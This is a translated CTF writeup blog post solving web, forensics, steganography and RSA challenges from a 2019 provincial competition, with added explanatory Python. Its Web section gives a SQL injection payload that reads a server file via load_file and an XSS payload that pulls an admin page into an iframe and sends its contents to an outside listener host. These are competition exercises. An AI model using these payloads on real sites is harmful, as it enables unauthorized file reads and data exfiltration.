Virtua1's blog

2019 Provincial Competition Preliminary Round Writeup

Word count: 1.1k   Reading time: 5 min
2019/09/23

tcl (too much of a noob).

Web

Web1

This one is a SQL injection. The injection point sits inside a quoted value, so the string literals around the injected expression are coerced to numbers: '1' + ascii(...) + '2' is evaluated as 1 + ascii(...) + 2. load_file() reads the flag file one character at a time, X being the character position; the value the expression evaluates to, minus 3, is that character's ASCII code.

payload: 1'+(select ascii(substr(load_file('/ctf/flag'),X,1)))+'2

image.png

Web2

Idea: an iframe tag combined with SQL injection.

The hint at the start says you are not admin, so I kept thinking the XSS had to steal the admin's cookie, and that never worked. The right idea is to have the XSS visit the injection page directly.

In the submission form, the XSS is an iframe that loads the SQL-injection URL; submit the resulting page in the feedback form and the xssbot visits the submitted XSS page automatically.

The environment is gone, so I can't reproduce it. Payload:

var iframe = document.createElement("iframe");
// load the admin-only injection page inside the xssbot's (admin) session
iframe.src = "/admin.php?id=-999 union select 1,2,flagg from flag";
document.body.appendChild(iframe);
// poll once a second; the iframe is same-origin, so its body is readable from here
setInterval(function () {
	var c = encodeURI(document.getElementsByTagName("iframe")[0].contentWindow.document.getElementsByTagName("body")[0].innerHTML);
	// xssListener is the host of the listener this payload was templated with
	window.location.href = "http://" + xssListener + "?flag=" + btoa(c);
}, 1000);

Misc

Sign-in

Send "give me flag" to the official WeChat account to get a QR code; scan it and base64-decode the result to get the flag.

20190923162112.png

Misc2

Filter the capture on http and it is clearly boolean blind-injection traffic; extract the probes and convert them to get the flag.

The packets with size 518 are the ones where the compared value is the ASCII code of a flag character, so just pull those out one by one; it's quick.

20190923170439.png

20190923172013.png

Misc3

binwalk the image and carve with foremost to get a zip archive; extracting it asks for a password.

20190923172517.png

20190923172619.png

Change the image height and the zip password appears: aptx4869

20190923172854.png

Extracting it gives a Word document with no visible flag. Run binwalk on it again: it contains a zip archive, so change the extension and extract it.

20190923173255.png

The flag is in word/document.xml inside the extracted archive.

image.png
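The writeup only says the image height was changed. As an added example that is not from the original, here is how to find the original height when a challenge shrinks it: the IHDR CRC was computed over the original height, so brute-forcing the height field until the CRC matches recovers it, and set_height() writes it back with a correct CRC. The PNG is constructed by make_png() so the script runs offline; the zlib/struct usage is standard library.

```python
import struct
import zlib

PNG_SIG = b"\x89PNG\r\n\x1a\n"


def _chunk(ctype: bytes, data: bytes) -> bytes:
    """length + type + data + CRC32(type + data), as the PNG spec defines a chunk."""
    return struct.pack(">I", len(data)) + ctype + data + struct.pack(">I", zlib.crc32(ctype + data))


def make_png(width: int, height: int) -> bytes:
    """Constructed minimal 8-bit grayscale PNG so the example needs no real file."""
    ihdr = struct.pack(">IIBBBBB", width, height, 8, 0, 0, 0, 0)
    raw = b"".join(b"\x00" + bytes([(x * 7 + y * 13) & 0xFF for x in range(width)])
                   for y in range(height))            # filter byte 0 + one row
    return PNG_SIG + _chunk(b"IHDR", ihdr) + _chunk(b"IDAT", zlib.compress(raw)) + _chunk(b"IEND", b"")


def read_ihdr(png: bytes):
    """Return (width, height, 13-byte IHDR body, stored CRC)."""
    if png[:8] != PNG_SIG:
        raise ValueError("not a PNG")
    length, ctype = struct.unpack(">I4s", png[8:16])
    if ctype != b"IHDR" or length != 13:
        raise ValueError("first chunk is not a valid IHDR")
    body = png[16:29]
    (crc,) = struct.unpack(">I", png[29:33])
    width, height = struct.unpack(">II", body[:8])
    return width, height, body, crc


def recover_height(png: bytes, max_height: int = 20000) -> int:
    """If the stored CRC does not match the IHDR, search for the height it was computed over."""
    _, height, body, crc = read_ihdr(png)
    if zlib.crc32(b"IHDR" + body) == crc:
        return height                                 # nothing was tampered with
    for h in range(1, max_height + 1):
        candidate = body[:4] + struct.pack(">I", h) + body[8:]
        if zlib.crc32(b"IHDR" + candidate) == crc:
            return h
    raise ValueError("no height in range reproduces the IHDR CRC (width may have changed too)")


def set_height(png: bytes, height: int, fix_crc: bool = True) -> bytes:
    """Rewrite the IHDR height. fix_crc=False reproduces a CTF-style tampered file."""
    _, _, body, crc = read_ihdr(png)
    body = body[:4] + struct.pack(">I", height) + body[8:]
    if fix_crc:
        crc = zlib.crc32(b"IHDR" + body)
    return PNG_SIG + struct.pack(">I", 13) + b"IHDR" + body + struct.pack(">I", crc) + png[33:]


if __name__ == "__main__":
    cropped = set_height(make_png(8, 40), 5, fix_crc=False)   # simulate the challenge file
    original = recover_height(cropped)
    open("fixed.png", "wb").write(set_height(cropped, original))
    print("recovered height:", original)
```

Viewers that ignore the CRC (most do) still render the cropped file, which is why the hidden rows go unnoticed until the height is restored; the IDAT data for those rows is still present.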

Misc4 (morning)

foremost carves out a second image; browsing the color planes in Stegsolve reveals a QR code, and scanning it gives a string in the Core Socialist Values encoding.

image.png

image.png

Misc5 (afternoon)

The hint was the protocol the ping command uses; ping uses ICMP, so filter the capture on icmp.

ping is an example of the application layer using network-layer ICMP directly, without going through TCP or UDP at the transport layer.

The idea is to extract the TTL of every packet and write the values as raw bytes into a zip file. Doing that by hand is a lot of work, so use Python.

At first the extracted zip was garbage; testing showed the first packet was not being read, so its byte is written first by hand.

import re
import struct

import pyshark

out = open('icmp.zip', 'wb')
cap = pyshark.FileCapture('./flag2.pcapng', only_summaries=True, display_filter="icmp")
# the first packet was not picked up, so its byte ('P' of the zip's "PK" magic) is written by hand
out.write(struct.pack('B', 80))

for pkt in cap:
	print(pkt)
	# the summary line carries "ttl=NN"; each packet's TTL is one byte of the zip
	ttl = re.search(r'ttl=(\d+)', str(pkt)).group(1)
	out.write(struct.pack('B', int(ttl)))
out.close()

image.png
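The same extraction without pyshark, as an added example that is not from the writeup: a classic-pcap parser that reads the IPv4 TTL of every ICMP frame in capture order. It handles the legacy pcap format only (the writeup's file is pcapng, which would first need converting, e.g. with editcap -F pcap); the capture is constructed by build_pcap() so the script runs offline, and fix_zip_magic() encodes the writeup's observation that the first byte was missing.

```python
import struct


def build_pcap(ttls, proto: int = 1) -> bytes:
    """Constructed classic pcap: one Ethernet/IPv4/ICMP echo request per byte, byte in the TTL."""
    header = struct.pack("<IHHiIII", 0xA1B2C3D4, 2, 4, 0, 0, 65535, 1)  # LINKTYPE_ETHERNET
    out = [header]
    for seq, ttl in enumerate(ttls):
        eth = b"\x00" * 12 + b"\x08\x00"                                # dst, src, EtherType IPv4
        ip = struct.pack(">BBHHHBBH4s4s", 0x45, 0, 28, seq, 0, ttl, proto, 0,
                         b"\x0a\x00\x00\x01", b"\x0a\x00\x00\x02")
        icmp = struct.pack(">BBHHH", 8, 0, 0, 1, seq)                   # echo request
        frame = eth + ip + icmp
        out.append(struct.pack("<IIII", seq, 0, len(frame), len(frame)) + frame)
    return b"".join(out)


def iter_frames(pcap: bytes):
    """Yield the raw frames of a classic pcap file, honouring its byte order."""
    (magic,) = struct.unpack("<I", pcap[:4])
    if magic == 0xA1B2C3D4:
        endian = "<"
    elif magic == 0xD4C3B2A1:
        endian = ">"
    else:
        raise ValueError("not a classic pcap (pcapng is not handled here)")
    off = 24
    while off + 16 <= len(pcap):
        _sec, _usec, incl_len, _orig_len = struct.unpack(endian + "IIII", pcap[off:off + 16])
        off += 16
        yield pcap[off:off + incl_len]
        off += incl_len


def ttl_bytes(pcap: bytes, proto: int = 1) -> bytes:
    """Collect the IPv4 TTL of every frame of the given IP protocol (1 = ICMP), in capture order."""
    out = bytearray()
    for frame in iter_frames(pcap):
        if len(frame) < 34 or frame[12:14] != b"\x08\x00":   # Ethernet + full IPv4 header, IPv4 only
            continue
        if frame[23] != proto:                               # IPv4 protocol field
            continue
        out.append(frame[22])                                # IPv4 TTL field
    return bytes(out)


def fix_zip_magic(data: bytes) -> bytes:
    """The writeup found the first packet missing: restore the 'P' of the PK\\x03\\x04 zip magic."""
    return b"P" + data if data.startswith(b"K\x03\x04") else data


if __name__ == "__main__":
    sample = build_pcap(b"PK\x03\x04constructed zip bytes")   # stands in for flag2.pcap
    open("icmp.zip", "wb").write(fix_zip_magic(ttl_bytes(sample)))
```

Filtering on the protocol field rather than on "everything in the file" matters on a real capture: any non-ICMP packet, or a reply whose TTL the other host chose, would corrupt the archive.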

Crypto

RSA

The environment was down for a while at first. A standard problem, the only twist being the hex conversion.

n=0xEFF76062D52A7D4927DF587FBBC293CF9A622F56E854055D6A30DCF77C9B7591
e=0x10001
c=0x6cd55a2bbb49dfd2831e34b76cb5bdfad34418a4be96180b618581e9b6319f86

Convert n to an integer, then factor it; an online factoring service does it.

n = 0xEFF76062D52A7D4927DF587FBBC293CF9A622F56E854055D6A30DCF77C9B7591  # a hex literal is already an int
print(n)

image.png

p = 325593180411801742356727264127253758939
q = 333360321402603178263879595968004169219

Then compute d, convert it to hex and decrypt.

Full script:

# -*- coding: utf-8 -*-
import gmpy2

n = 0xEFF76062D52A7D4927DF587FBBC293CF9A622F56E854055D6A30DCF77C9B7591
e = 0x10001
c = 0x6cd55a2bbb49dfd2831e34b76cb5bdfad34418a4be96180b618581e9b6319f86

# factors of n, from the online factoring service
p = 325593180411801742356727264127253758939
q = 333360321402603178263879595968004169219

phi_n = (p - 1) * (q - 1)
d = int(gmpy2.invert(e, phi_n))
print(hex(d))  # 0x1fcecb90ee2e8ea2d6cd2d1ee955766009a175962525938fe578b1da54f9990d in the original run

m = int(pow(c, d, n))
# big-endian bytes of m; avoids the odd-length hex problem of .decode('hex')
print(m.to_bytes((m.bit_length() + 7) // 8, 'big'))

MIX

(lambda __operator, __print, __g, __y: [(sys.setrecursionlimit(1000000), [[[[[(decode(cipher), None)[1] for __g['cipher'] in [('D6VNEIRAryZ8Opdbl3bOwqmBD+lmFXbcd/XSghalqYBh1FDtbJo=')]][0] for __g['decode'], decode.__name__ in [(lambda cipher: (lambda __l: [(init(), [[[(lambda __after: (__print('sorry,you dont have the auth'), 0)[1] if (__l['auth'] != 1) else __after())(lambda: (lambda __items, __after, __sentinel: __y(lambda __this: lambda: (lambda __i: [[__this() for __l['result'] in [(__operator.iadd(__l['result'], chr((s[(__l['i'] % 256)] ^ ord(__l['cipher'][__l['i']])))))]][0] for __l['i'] in [(__i)]][0] if __i is not __sentinel else __after())(next(__items, __sentinel)))())(iter(range(len(__l['cipher']))), lambda: (__print(__l['result'].encode('base64')), None)[1], [])) for __l['auth'] in [(0)]][0] for __l['cipher'] in [(__l['cipher'].decode('base64'))]][0] for __l['result'] in [('')]][0])[1] for __l['cipher'] in [(cipher)]][0])({}), 'decode')]][0] for __g['init'], init.__name__ in [(lambda : (lambda __l: [[(lambda __items, __after, __sentinel: __y(lambda __this: lambda: (lambda __i: [(s.append(__l['i']), (k.append(ord(__l['key'][(__l['i'] % len(__l['key']))])), __this())[1])[1] for __l['i'] in [(__i)]][0] if __i is not __sentinel else __after())(next(__items, __sentinel)))())(iter(range(256)), lambda: (lambda __items, __after, __sentinel: __y(lambda __this: lambda: (lambda __i: [[[[[__this() for s[__l['j']] in [(__l['tmp'])]][0] for s[__l['i']] in [(s[__l['j']])]][0] for __l['tmp'] in [(s[__l['i']])]][0] for __l['j'] in [((((__l['j'] + s[__l['i']]) + k[__l['i']]) % 256))]][0] for __l['i'] in [(__i)]][0] if __i is not __sentinel else __after())(next(__items, __sentinel)))())(iter(range(256)), lambda: None, []), []) for __l['j'] in [(0)]][0] for __l['key'] in [('aV9hbV9ub3RfZmxhZw=='.decode('base64'))]][0])({}), 'init')]][0] for __g['k'] in [([])]][0] for __g['s'] in [([])]][0])[1] for __g['sys'] in [(__import__('sys', __g, __g))]][0])(__import__('operator', level=0), __import__('__builtin__', level=0).__dict__['print'], globals(), (lambda f: (lambda x: x(x))(lambda y: f(lambda: y(y)()))))

Functional-style obfuscated Python 2 (it relies on .decode('base64') and __builtin__). Running it prints: sorry,you dont have the auth

Search the script for the auth check:

image.png

Change if (__l['auth'] != 1) to if (__l['auth'] == 1), run it again and base64-decode the output to get the flag.

image.png
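What the obfuscated script actually computes, as an added example that is not from the original: init() is the RC4 key-scheduling algorithm with the key base64-decoded from 'aV9hbV9ub3RfZmxhZw==' ("i_am_not_flag"), and decode() XORs cipher byte i with s[i % 256] of the scheduled S-box without ever running RC4's output stage, so it is not real RC4. The reimplementation below returns the plaintext bytes directly (the script prints them base64-encoded); the standard RC4 PRGA is included only for comparison and to check the KSA against a known test vector, the script itself never runs it.

```python
import base64

KEY_B64 = "aV9hbV9ub3RfZmxhZw=="                                      # from the script
CIPHER_B64 = "D6VNEIRAryZ8Opdbl3bOwqmBD+lmFXbcd/XSghalqYBh1FDtbJo="   # from the script


def script_key() -> bytes:
    return base64.b64decode(KEY_B64)


def rc4_ksa(key: bytes) -> list:
    """RC4 key scheduling: exactly what the script's init() builds in the global s."""
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) % 256
        s[i], s[j] = s[j], s[i]
    return s


def sbox_xor(data: bytes, key: bytes) -> bytes:
    """The script's decode(): XOR byte i with s[i % 256] of the scheduled S-box, no PRGA."""
    s = rc4_ksa(key)
    return bytes(b ^ s[i % 256] for i, b in enumerate(data))


def rc4_prga(s: list, n: int) -> bytes:
    """Standard RC4 keystream generation, for comparison only; the script skips this step."""
    s = s[:]
    i = j = 0
    out = bytearray()
    for _ in range(n):
        i = (i + 1) % 256
        j = (j + s[i]) % 256
        s[i], s[j] = s[j], s[i]
        out.append(s[(s[i] + s[j]) % 256])
    return bytes(out)


def rc4(data: bytes, key: bytes) -> bytes:
    """Real RC4, used here to validate rc4_ksa() against the published 'Key'/'Plaintext' vector."""
    return bytes(a ^ b for a, b in zip(data, rc4_prga(rc4_ksa(key), len(data))))


def decode_flag(cipher_b64: str = CIPHER_B64, key_b64: str = KEY_B64) -> bytes:
    """Same result as the patched script, minus the base64 it wraps around its output."""
    return sbox_xor(base64.b64decode(cipher_b64), base64.b64decode(key_b64))


if __name__ == "__main__":
    print(decode_flag())
```

Because the keystream is just the S-box read in order, the same key always gives the same 256-byte pad, and the XOR is its own inverse: sbox_xor() both encrypts and decrypts, so patching the auth check or re-running the transform give the same answer.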

RSA (morning)

n= 544187306850902797629107353619267427694837163600853983242783
e= 39293
c= 439254895818320413408827022398053685867343267971712332011972
m=???

Factor n online directly; it has three prime factors.

image.png

p=67724172605733871
q=11571390939636959887
x=694415063702720454699679
#!/usr/bin/env python3
# coding:utf-8

import gmpy2

e = 39293
p = 67724172605733871
q = 11571390939636959887
x = 694415063702720454699679
n = p * q * x

# with three prime factors phi(n) = (p-1)(q-1)(x-1)
d = int(gmpy2.invert(e, (p - 1) * (q - 1) * (x - 1)))
print(d)  # 415207173272340254768303683638195276777445388907010003792757

c = 439254895818320413408827022398053685867343267971712332011972
m = hex(pow(c, d, n))[2:]
if len(m) % 2 == 1:      # bytes.fromhex() needs an even number of hex digits
    m = '0' + m
print(bytes.fromhex(m))
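Both RSA tasks on this page are the same computation with a different number of primes. As an added example that is not from the writeup, here is a single stdlib-only decryptor: given the prime factors it computes phi(n) as the product of (p-1), d = e^-1 mod phi(n), and converts the plaintext integer to bytes directly, so the odd-length-hex fix-up disappears. The __main__ block feeds it the two parameter sets from this page and checks that the factors really multiply to the given n before decrypting.

```python
from math import prod
from typing import Sequence


def rsa_private_exponent(e: int, primes: Sequence[int]) -> int:
    """d = e^-1 mod phi(n), with phi(n) = prod(p-1) for a squarefree n of any number of primes."""
    phi = prod(p - 1 for p in primes)
    return pow(e, -1, phi)                    # ValueError if gcd(e, phi) != 1, i.e. wrong factors


def rsa_decrypt_int(c: int, e: int, primes: Sequence[int]) -> int:
    n = prod(primes)
    return pow(c, rsa_private_exponent(e, primes), n)


def int_to_bytes(m: int) -> bytes:
    """Big-endian bytes of m; replaces hex(m)[2:].decode('hex') and its odd-length problem."""
    return m.to_bytes((m.bit_length() + 7) // 8, "big")


def rsa_decrypt(c: int, e: int, primes: Sequence[int]) -> bytes:
    return int_to_bytes(rsa_decrypt_int(c, e, primes))


if __name__ == "__main__":
    # the two instances from this writeup; n is only used to check the factorisation
    instances = [
        ("RSA",
         0xEFF76062D52A7D4927DF587FBBC293CF9A622F56E854055D6A30DCF77C9B7591,
         0x10001,
         0x6cd55a2bbb49dfd2831e34b76cb5bdfad34418a4be96180b618581e9b6319f86,
         [325593180411801742356727264127253758939, 333360321402603178263879595968004169219]),
        ("RSA (morning)",
         544187306850902797629107353619267427694837163600853983242783,
         39293,
         439254895818320413408827022398053685867343267971712332011972,
         [67724172605733871, 11571390939636959887, 694415063702720454699679]),
    ]
    for name, n, e, c, primes in instances:
        if prod(primes) != n:
            print(name, ": factors do not multiply to n, check the factorisation")
            continue
        print(name, ":", rsa_decrypt(c, e, primes))
```

Checking prod(primes) == n before inverting e is the cheap guard that catches a mis-copied factor; with a wrong factor set the inversion may still succeed and simply yield garbage.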